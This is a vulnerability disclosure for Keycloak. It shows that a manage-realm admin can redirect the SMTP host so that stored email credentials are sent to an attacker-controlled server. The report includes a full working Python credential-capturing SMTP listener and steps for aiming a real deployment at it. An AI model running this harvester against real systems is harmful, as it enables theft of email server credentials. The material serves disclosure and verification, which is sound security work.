Description
Before reporting an issue
- I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.
Area
admin/api
Describe the bug
The email server configuration has a security vulnerability that allows credential harvesting. An attacker with manage-realm permissions can modify the host/port configuration without needing to re-enter or know the existing email server credentials. The credentials can be harvested either through using the test connection functionality or by triggering any email-sending workflow, causing Keycloak to attempt authentication to an attacker-controlled server.
Attack scenarios:
Using test connection:
- Attacker gains access to an account with manage-realm permissions
- Attacker modifies email server host/port to point to their controlled server
- Attacker uses the test connection functionality
- Keycloak connects to the attacker's server using stored credentials
Using email-sending workflows:
- Attacker gains access to an account with manage-realm permissions
- Attacker modifies email server host/port to point to their controlled server
- Attacker triggers any functionality that sends emails (e.g., password reset)
- Keycloak connects to the attacker's server using stored credentials
In both scenarios, the attacker can capture the authentication attempt and harvest the email server credentials.
Version
26.1.5
Regression
- The issue is a regression
Expected behavior
When modifying email server connection parameters (host/port):
- System should require the external service credentials to be re-entered
- Changing parts of the configuration should invalidate the stored credentials
- Users should not be able to reuse stored credentials with modified connection parameters
Actual behavior
When modifying email server host/port:
- Previously stored credentials remain valid and usable
- No requirement to re-enter external service credentials
- Both test connection and email-sending functionalities will send credentials to the modified host
- Credentials can be captured by controlling the target server
- The UI and API mask the stored password in their responses, but the SMTP connection itself still authenticates with the real stored credentials
How to Reproduce?
Method 1 (Test Connection):
- Configure email server with valid credentials in Keycloak
- Using manage-realm permissions, modify only the host/port settings to point to a different server
- Use the test connection functionality
- Observe that Keycloak attempts to authenticate to the new host using the stored credentials
Method 2 (Email Workflow):
- Configure email server with valid credentials in Keycloak
- Using manage-realm permissions, modify only the host/port settings to point to a different server
- Save the configuration
- Trigger any email-sending functionality (e.g., use "Forgot Password" flow)
- Observe that Keycloak attempts to authenticate to the new host using the stored credentials
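A check that goes with both reproduction methods, added here as an example and not part of the original report or of Keycloak: a minimal SMTP listener that records whatever AUTH PLAIN or AUTH LOGIN credentials a client offers it. Point the realm's email host/port at the machine running it, then use the test connection button or trigger a "Forgot Password" flow; a non-empty capture list shows that the stored credentials were sent to the new host. The banner hostname, the client hostname and the credentials used by the demo function are constructed for the example; the demo drives the listener with Python's smtplib as a stand-in for the Keycloak mail client.

```python
"""Credential-capturing SMTP listener (added example, not Keycloak code).

Accepts EHLO, advertises AUTH PLAIN and AUTH LOGIN, records any credentials
the client presents, and refuses actual mail submission. Use it to confirm
whether an SMTP client re-sends stored credentials after only host/port of
its configuration changed. All names and secrets below are constructed.
"""
import base64
import smtplib
import socketserver
import threading

BANNER_HOST = "capture.example.test"  # constructed hostname for the SMTP banner


class CapturedCredentials:
    """Thread-safe list of (user, password) pairs offered to the listener."""

    def __init__(self):
        self._lock = threading.Lock()
        self.items = []

    def add(self, user, password):
        with self._lock:
            self.items.append((user, password))


def decode_auth_plain(payload_b64):
    """AUTH PLAIN carries base64([authzid] NUL authcid NUL password)."""
    parts = base64.b64decode(payload_b64, validate=True).split(b"\x00")
    if len(parts) != 3:
        raise ValueError("malformed AUTH PLAIN payload")
    return parts[1].decode("utf-8"), parts[2].decode("utf-8")


def _b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


class CapturingSMTPHandler(socketserver.StreamRequestHandler):
    """Speaks just enough ESMTP to get a client through AUTH, then refuses mail."""

    def send(self, line):
        self.wfile.write((line + "\r\n").encode("utf-8"))

    def recv(self):
        raw = self.rfile.readline()
        return raw.decode("utf-8", errors="replace").rstrip("\r\n") if raw else None

    def handle(self):
        self.send(f"220 {BANNER_HOST} ESMTP ready")
        while (line := self.recv()) is not None:
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb in ("EHLO", "HELO"):
                # STARTTLS is deliberately not offered: a client with STARTTLS
                # merely enabled continues in cleartext, one that requires TLS aborts.
                self.send(f"250-{BANNER_HOST}")
                self.send("250 AUTH PLAIN LOGIN")
            elif verb == "AUTH":
                self.handle_auth(arg)
            elif verb == "QUIT":
                self.send("221 2.0.0 bye")
                return
            elif verb in ("NOOP", "RSET"):
                self.send("250 2.0.0 ok")
            else:
                # MAIL/RCPT/DATA: only the AUTH exchange is wanted, never a message.
                self.send("554 5.7.1 submission not accepted by capture listener")

    def handle_auth(self, arg):
        mech, _, initial = arg.partition(" ")
        mech = mech.upper()
        try:
            if mech == "PLAIN":
                if not initial:  # client waits for an empty challenge first
                    self.send("334 ")
                    initial = self.recv() or ""
                user, password = decode_auth_plain(initial)
            elif mech == "LOGIN":
                user_b64 = initial
                if not user_b64:  # no initial response: challenge for the username
                    self.send("334 " + _b64("Username:"))
                    user_b64 = self.recv() or ""
                self.send("334 " + _b64("Password:"))
                pass_b64 = self.recv() or ""
                user = base64.b64decode(user_b64, validate=True).decode("utf-8")
                password = base64.b64decode(pass_b64, validate=True).decode("utf-8")
            else:
                self.send("504 5.5.4 unrecognized authentication type")
                return
        except (ValueError, UnicodeDecodeError):
            self.send("501 5.5.2 malformed authentication data")
            return
        self.server.captured.add(user, password)
        self.send("235 2.7.0 authentication successful")


class CapturingSMTPServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address):
        super().__init__(address, CapturingSMTPHandler)
        self.captured = CapturedCredentials()


def start_listener(host="127.0.0.1", port=0):
    """Bind (port 0 = ephemeral) and serve in a background thread."""
    server = CapturingSMTPServer((host, port))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo_capture(user, password, mechanism="PLAIN"):
    """Stand-in for the mail client under test: authenticate to the listener
    with smtplib using constructed credentials and return what was captured."""
    server = start_listener()
    try:
        host, port = server.server_address
        with smtplib.SMTP(host, port, local_hostname="client.example.test", timeout=5) as client:
            client.ehlo()
            client.user, client.password = user, password
            client.auth(mechanism, getattr(client, "auth_" + mechanism.lower()))
        return list(server.captured.items)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo_capture("smtp-svc", "constructed-secret", "LOGIN"))
```

To use it against a real deployment, call start_listener(host="0.0.0.0", port=25) on a host you control, set that host and port as the realm's email server, and read server.captured.items after the test connection or the password-reset e-mail fires. If the realm has STARTTLS required, the client will abort at EHLO because the listener offers no STARTTLS; the credentials are then only observable behind a TLS-terminating front, which this example deliberately does not include.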
Anything else?
- This issue was initially reported through security channels and has been cleared for public disclosure
- Issue has also been verified in version 26.2.2
- This vulnerability could lead to compromise of email server credentials
- The attack requires manage-realm permissions, but could be part of a privilege escalation chain
- Multiple functionalities can be used to exploit this issue:
- Test connection functionality
- Forgot Password flow
- Email verification
- Any other workflow that sends emails
- While the UI and API properly handle credential obfuscation in their responses, this doesn't prevent the actual credential exposure during SMTP connection attempts